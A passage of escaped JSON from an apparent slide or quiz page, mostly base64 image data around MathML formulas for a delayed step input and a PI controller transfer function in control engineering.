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\&quot;,\&quot;slideId\&quot;:293,\&quot;accessibleText\&quot;:\&quot;D open parentheses s close parentheses space equals thin space fraction numerator A. space e to the power of negative tau s end exponent over denominator s end fraction\&quot;,\&quot;imageHeight\&quot;:22.81081081081081},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;msub&gt;&lt;mi&gt;C&lt;/mi&gt;&lt;mrow&gt;&lt;mi&gt;P&lt;/mi&gt;&lt;mi&gt;I&lt;/mi&gt;&lt;/mrow&gt;&lt;/msub&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;k&lt;/mi&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;/msub&gt;&lt;mfenced&gt;&lt;mrow&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mfrac&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;mrow&gt;&lt;msub&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;/msub&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;/mrow&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;k&lt;/mi&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;/msub&gt;&lt;mfenced&gt;&lt;mfrac&gt;&lt;mrow&gt;&lt;msub&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;/msub&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;mrow&gt;&lt;msub&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;/msub&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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